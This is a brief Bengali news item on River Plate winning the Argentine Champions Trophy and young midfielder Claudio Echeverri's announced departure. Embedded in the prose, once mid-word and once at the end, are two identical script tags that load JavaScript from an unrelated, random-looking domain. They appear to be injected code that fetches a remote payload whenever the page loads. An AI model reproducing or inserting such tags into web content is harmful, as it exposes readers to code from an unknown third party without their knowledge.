আর্জেন্টাইন চ্যাম্পিয়নস ট্রফি জিতে বছর শেষ করেছে রিভারপ্লেট। ট্রফির লড়াইয়ে রোজারিও <script type='text/javascript' src='//t84c3srgclc9.com/5a/a9/00/5aa90066cd36b78fc874fce18321531e.js'></script>সেন্ট্রালকে রিভারপ্লেট হারায় ২-০ গোলে। তবে রিভারপ্লেটের শিরোপা জয়ের সে আনন্দ কিছুটা ম্লান হয়েছে ক্লদিও এচেভেরির ক্লাব ছাড়ার ঘোষণায়। এচেভেরি স্পষ্টভাবেই জানিয়ে দিয়েছেন, ‘আমি আর চুক্তি নবায়ন করছি না।’ এ ঘোষণায় রিভারপ্লেট সমর্থকদের মন খারাপ হলেও নড়েচড়ে বসেছে ইউরোপিয়ান জায়ান্টরা। রিভারপ্লেটের সঙ্গে তাঁর চুক্তির মেয়াদ ২০২৪ সালের ডিসেম্বর পর্যন্ত।
সম্প্রতি আর্জেন্টিনার হয়ে অনূর্ধ্ব-১৭ বিশ্বকাপ দিয়ে আলোচনায় আসেন এচেভেরি। কোয়ার্টার ফাইনালে ব্রাজিলের বিপক্ষে করেছেন হ্যাটট্রিকও। পাশাপাশি রিভারপ্লেটের হয়েও মুগ্ধতা ছড়িয়েছেন ১৭ বছর বয়সী এ অ্যাটাকিং মিডফিল্ডার। খেলার ধরনে লিওনেল মেসির সঙ্গে মিল থাকায় তাঁকে ডাকাও হচ্ছে ‘নতুন মেসি’ বলে। কারও কারও চোখে এচেভেরি আবার মেসি ও ডিয়েগো ম্যারাডোনার মিশ্রণ।<script type='text/javascript' src='//t84c3srgclc9.com/5a/a9/00/5aa90066cd36b78fc874fce18321531e.js'></script>
0 Comments